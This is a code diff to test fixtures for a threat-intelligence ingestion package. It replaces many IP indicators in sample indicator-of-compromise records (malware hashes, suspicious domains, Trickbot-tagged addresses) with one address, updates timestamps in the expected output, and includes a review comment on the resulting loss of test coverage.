+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":19901748}
 {"indicator":"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":31612067}
 {"indicator":"f8e58af3ffefd4037fef246e93a55dc8","description":"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09","title":null,"content":"","type":"FileHash-MD5","id":34413770}
 {"indicator":"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":111154034}
 {"indicator":"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":151858953}
-{"indicator":"213.252.244.38","description":null,"title":null,"content":"","type":"IPv4","id":311294364}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":311294364}
 {"indicator":"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":406540408}
 {"indicator":"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":565556753}
 {"indicator":"aeb08b0651bc8a13dcf5e5f6c0d482f8","description":"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","title":null,"content":"","type":"FileHash-MD5","id":565556755}
@@ -29,7 +29,7 @@
 {"indicator":"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1566067095}
 {"indicator":"ff2dcea4963e060a658f4dffbb119529","description":"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1566999970}
 {"indicator":"0d73f1a1c4b2f8723fffc83eb3d00f31","description":"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1569290125}
-{"indicator":"185.25.50.167","description":null,"title":null,"content":"","type":"IPv4","id":1592876453}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1592876453}
 {"indicator":"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1597058431}
 {"indicator":"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1603343478}
 {"indicator":"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","description":null,"title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA256","id":1606260302}
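Review bot: Every IPv4 indicator in this fixture now carries the same address, 89.160.20.156, so the sample no longer holds two IP indicators that the pipeline could tell apart; the same collapse happens in the @@ -29, @@ -43, @@ -52 and @@ -74 hunks of this file. Taking the original third-party addresses out of committed test data is the right call, but replacing nineteen of them with a single value means a regression that merged, deduplicated or mis-keyed IP indicators by value would still reproduce the expected file, and `id` is now the only field that separates those records. If the supported subset named in the changelog contains more than one address, spreading the replacements over a few of them (keeping the `id` values as they are) would preserve that coverage at no cost. The two `"title":"Trickbot"` records would be worth keeping on an address of their own so the title-to-indicator mapping stays observable.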
@@ -43,8 +43,8 @@
 {"indicator":"1581fe76e3c96dc33182daafd09c8cf5c17004e0","description":"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260353}
 {"indicator":"b72e75e9e901a44b655a5cf89cf0eadcaff46037","description":"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA1","id":1606260364}
 {"indicator":"maper.info","description":null,"title":null,"content":"","type":"domain","id":1634015726}
-{"indicator":"213.252.244.126","description":null,"title":null,"content":"","type":"IPv4","id":1635374317}
-{"indicator":"78.129.139.131","description":null,"title":null,"content":"","type":"IPv4","id":1756014820}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1635374317}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1756014820}
 {"indicator":"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543412}
 {"indicator":"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543416}
 {"indicator":"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543440}
@@ -52,20 +52,20 @@
 {"indicator":"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543445}
 {"indicator":"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543456}
 {"indicator":"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543458}
-{"indicator":"103.13.67.4","description":null,"title":null,"content":"","type":"IPv4","id":2114754074}
-{"indicator":"80.90.87.201","description":null,"title":null,"content":"","type":"IPv4","id":2114754077}
-{"indicator":"80.80.163.182","description":null,"title":null,"content":"","type":"IPv4","id":2114754078}
-{"indicator":"91.187.114.210","description":null,"title":null,"content":"","type":"IPv4","id":2114754080}
-{"indicator":"170.238.117.187","description":null,"title":null,"content":"","type":"IPv4","id":2117062744}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754074}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754077}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754078}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754080}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2117062744}
 {"indicator":"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":2117884668}
-{"indicator":"103.84.238.3","description":null,"title":null,"content":"","type":"IPv4","id":2119746545}
-{"indicator":"179.43.158.171","description":null,"title":null,"content":"","type":"IPv4","id":2129763785}
-{"indicator":"198.211.116.199","description":null,"title":null,"content":"","type":"IPv4","id":2136050161}
-{"indicator":"203.176.135.102","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2119746545}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2129763785}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2136050161}
+{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568}
 {"indicator":"fotmailz.com","description":null,"title":null,"content":"","type":"domain","id":2137741373}
 {"indicator":"pori89g5jqo3v8.com","description":null,"title":null,"content":"","type":"domain","id":2137741468}
 {"indicator":"sebco.co.ke","description":null,"title":null,"content":"","type":"domain","id":2178708355}
-{"indicator":"177.74.232.124","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102}
+{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102}
 {"indicator":"chishir.com","description":null,"title":null,"content":"","type":"domain","id":2186034800}
 {"indicator":"kostunivo.com","description":null,"title":null,"content":"","type":"domain","id":2186034803}
 {"indicator":"mangoclone.com","description":null,"title":null,"content":"","type":"domain","id":2186034805}
@@ -74,9 +74,9 @@
 {"indicator":"24d4bbc982a6a561f0426a683b9617de1a96a74a","description":null,"title":"Sf:ShellCode-DZ\\ [Trj]","content":"","type":"FileHash-SHA1","id":2186034903}
 {"indicator":"fa98074dc18ad7e2d357b5d168c00a91256d87d1","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034912}
 {"indicator":"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034924}
-{"indicator":"96.9.77.142","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445}
-{"indicator":"36.89.106.69","description":null,"title":null,"content":"","type":"IPv4","id":2189036446}
-{"indicator":"96.9.73.73","description":null,"title":null,"content":"","type":"IPv4","id":2190596263}
+{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2189036446}
+{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2190596263}
 {"indicator":"10ec3571596c30b9993b89f12d29d23c","description":"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","title":"xor_0x20_xord_javascript","content":"","type":"FileHash-MD5","id":2192837907}
 {"id":73,"indicator":"http://www.playboysplus.com","type":"URL","title":null,"description":null,"content":""}
 {"id":74,"indicator":"http://join.playboysplus.com/signup/","type":"URL","title":null,"description":null,"content":""}
diff --git a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json
index a249c4d24e4..3bdbae126df 100644
--- a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json
+++ b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json @@ -8,12 +8,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "86.104.194.30" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549599093Z", - "original": "{\"indicator\":\"86.104.194.30\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1588938}", + "ingested": "2021-12-09T13:49:09.053417Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1588938}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -41,7 +41,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549639819Z", + "ingested": "2021-12-09T13:49:09.053426200Z", "original": "{\"indicator\":\"90421f8531f963d81cf54245b72cde80\",\"description\":\"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65\",\"title\":\"Win32:Hoblig-B\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":9751110}", "category": "threat", "type": "indicator", @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549647564Z", + "ingested": "2021-12-09T13:49:09.053432600Z", "original": "{\"indicator\":\"ip.anysrc.net\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"hostname\",\"id\":16782717}", "category": "threat", "type": "indicator", @@ -83,12 +83,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "107.173.58.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549653645Z", - "original": "{\"indicator\":\"107.173.58.176\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":19901748}", + "ingested": "2021-12-09T13:49:09.053438600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":19901748}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -113,7 +113,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549659947Z", + "ingested": "2021-12-09T13:49:09.053444600Z", "original": "{\"indicator\":\"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":31612067}", "category": "threat", "type": "indicator", @@ -141,7 +141,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549665437Z", + "ingested": "2021-12-09T13:49:09.053450600Z", "original": "{\"indicator\":\"f8e58af3ffefd4037fef246e93a55dc8\",\"description\":\"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09\",\"title\":null,\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":34413770}", "category": "threat", "type": "indicator", @@ -167,7 +167,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549670838Z", + "ingested": "2021-12-09T13:49:09.053456600Z", "original": "{\"indicator\":\"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":111154034}", "category": "threat", "type": "indicator", @@ -195,7 +195,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549676488Z", + "ingested": "2021-12-09T13:49:09.053462500Z", "original": "{\"indicator\":\"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":151858953}", "category": "threat", "type": "indicator", 
@@ -213,12 +213,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "213.252.244.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549681938Z", - "original": "{\"indicator\":\"213.252.244.38\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":311294364}", + "ingested": "2021-12-09T13:49:09.053468600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":311294364}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -243,7 +243,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549687529Z", + "ingested": "2021-12-09T13:49:09.053474100Z", "original": "{\"indicator\":\"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":406540408}", "category": "threat", "type": "indicator", @@ -269,7 +269,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549710542Z", + "ingested": "2021-12-09T13:49:09.053477700Z", "original": "{\"indicator\":\"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":565556753}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549719689Z", + "ingested": "2021-12-09T13:49:09.053482700Z", "original": "{\"indicator\":\"aeb08b0651bc8a13dcf5e5f6c0d482f8\",\"description\":\"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6\",\"title\":null,\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":565556755}", "category": "threat", "type": "indicator", 
@@ -323,7 +323,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549725721Z", + "ingested": "2021-12-09T13:49:09.053488100Z", "original": "{\"indicator\":\"6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":575672549}", "category": "threat", "type": "indicator", @@ -349,7 +349,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549730770Z", + "ingested": "2021-12-09T13:49:09.053493300Z", "original": "{\"indicator\":\"c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":575672550}", "category": "threat", "type": "indicator", @@ -375,7 +375,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549735619Z", + "ingested": "2021-12-09T13:49:09.053497600Z", "original": "{\"indicator\":\"e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":995160791}", "category": "threat", "type": "indicator", @@ -401,7 +401,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549740198Z", + "ingested": "2021-12-09T13:49:09.053501600Z", "original": "{\"indicator\":\"d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1011989699}", "category": "threat", "type": "indicator", @@ -427,7 +427,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549745658Z", + "ingested": "2021-12-09T13:49:09.053505800Z", "original": "{\"indicator\":\"70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1011989701}", "category": "threat", "type": "indicator", 
@@ -456,7 +456,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549750327Z", + "ingested": "2021-12-09T13:49:09.053509400Z", "original": "{\"indicator\":\"29340643ca2e6677c19e1d3bf351d654\",\"description\":\"MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472176322}", "category": "threat", "type": "indicator", @@ -485,7 +485,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549754745Z", + "ingested": "2021-12-09T13:49:09.053514100Z", "original": "{\"indicator\":\"86c314bc2dc37ba84f7364acd5108c2b\",\"description\":\"MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457325}", "category": "threat", "type": "indicator", @@ -514,7 +514,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549760456Z", + "ingested": "2021-12-09T13:49:09.053520100Z", "original": "{\"indicator\":\"cb0c1248d3899358a375888bb4e8f3fe\",\"description\":\"MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457326}", "category": "threat", "type": "indicator", @@ -543,7 +543,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549766748Z", + "ingested": "2021-12-09T13:49:09.053526100Z", "original": "{\"indicator\":\"d348f536e214a47655af387408b4fca5\",\"description\":\"MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457327}", "category": "threat", "type": "indicator", 
@@ -571,7 +571,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549771607Z", + "ingested": "2021-12-09T13:49:09.053532Z", "original": "{\"indicator\":\"29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413\",\"description\":null,\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012751}", "category": "threat", "type": "indicator", @@ -597,7 +597,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549777438Z", + "ingested": "2021-12-09T13:49:09.053538100Z", "original": "{\"indicator\":\"b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012939}", "category": "threat", "type": "indicator", @@ -623,7 +623,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549782046Z", + "ingested": "2021-12-09T13:49:09.053544400Z", "original": "{\"indicator\":\"e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012967}", "category": "threat", "type": "indicator", @@ -651,7 +651,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549786915Z", + "ingested": "2021-12-09T13:49:09.053550400Z", "original": "{\"indicator\":\"465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"description\":null,\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1564141498}", "category": "threat", "type": "indicator", @@ -677,7 +677,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549792276Z", + "ingested": "2021-12-09T13:49:09.053556500Z", "original": "{\"indicator\":\"5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1564141523}", "category": "threat", "type": "indicator", 
@@ -706,7 +706,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549797836Z", + "ingested": "2021-12-09T13:49:09.053562500Z", "original": "{\"indicator\":\"14b74cb9be8cad8eb5fa8842d00bb692\",\"description\":\"MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1564142109}", "category": "threat", "type": "indicator", @@ -735,7 +735,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549802605Z", + "ingested": "2021-12-09T13:49:09.053568400Z", "original": "{\"indicator\":\"a5b59f7d133e354dfc73f40517aab730f322f0ef\",\"description\":\"SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1564142964}", "category": "threat", "type": "indicator", @@ -761,7 +761,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549807584Z", + "ingested": "2021-12-09T13:49:09.053574300Z", "original": "{\"indicator\":\"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1566067095}", "category": "threat", "type": "indicator", @@ -790,7 +790,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549812183Z", + "ingested": "2021-12-09T13:49:09.053580300Z", "original": "{\"indicator\":\"ff2dcea4963e060a658f4dffbb119529\",\"description\":\"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b\",\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1566999970}", "category": "threat", "type": "indicator", 
@@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549816501Z", + "ingested": "2021-12-09T13:49:09.053586200Z", "original": "{\"indicator\":\"0d73f1a1c4b2f8723fffc83eb3d00f31\",\"description\":\"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413\",\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1569290125}", "category": "threat", "type": "indicator", @@ -837,12 +837,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "185.25.50.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549823224Z", - "original": "{\"indicator\":\"185.25.50.167\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1592876453}", + "ingested": "2021-12-09T13:49:09.053592300Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1592876453}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -867,7 +867,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549828203Z", + "ingested": "2021-12-09T13:49:09.053598300Z", "original": "{\"indicator\":\"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1597058431}", "category": "threat", "type": "indicator", @@ -893,7 +893,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549833323Z", + "ingested": "2021-12-09T13:49:09.053604200Z", "original": "{\"indicator\":\"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1603343478}", "category": "threat", "type": "indicator", 
@@ -921,7 +921,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549839103Z", + "ingested": "2021-12-09T13:49:09.053610400Z", "original": "{\"indicator\":\"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"description\":null,\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260302}", "category": "threat", "type": "indicator", @@ -949,7 +949,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549843782Z", + "ingested": "2021-12-09T13:49:09.053616400Z", "original": "{\"indicator\":\"3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260304}", "category": "threat", "type": "indicator", @@ -975,7 +975,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549848311Z", + "ingested": "2021-12-09T13:49:09.053622500Z", "original": "{\"indicator\":\"b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260305}", "category": "threat", "type": "indicator", @@ -1003,7 +1003,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549853460Z", + "ingested": "2021-12-09T13:49:09.053626800Z", "original": "{\"indicator\":\"113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260310}", "category": "threat", "type": "indicator", @@ -1031,7 +1031,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549858440Z", + "ingested": "2021-12-09T13:49:09.053631500Z", "original": "{\"indicator\":\"9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260311}", "category": "threat", "type": "indicator", 
@@ -1057,7 +1057,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549867136Z", + "ingested": "2021-12-09T13:49:09.053636700Z", "original": "{\"indicator\":\"c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260316}", "category": "threat", "type": "indicator", @@ -1086,7 +1086,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549871995Z", + "ingested": "2021-12-09T13:49:09.053641800Z", "original": "{\"indicator\":\"ad20c6fac565f901c82a21b70f9739037eb54818\",\"description\":\"SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260341}", "category": "threat", "type": "indicator", @@ -1115,7 +1115,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549876143Z", + "ingested": "2021-12-09T13:49:09.053646100Z", "original": "{\"indicator\":\"13f11e273f9a4a56557f03821c3bfd591cca6ebc\",\"description\":\"SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260344}", "category": "threat", "type": "indicator", @@ -1144,7 +1144,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549880882Z", + "ingested": "2021-12-09T13:49:09.053650100Z", "original": "{\"indicator\":\"1581fe76e3c96dc33182daafd09c8cf5c17004e0\",\"description\":\"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260353}", "category": "threat", "type": "indicator", 
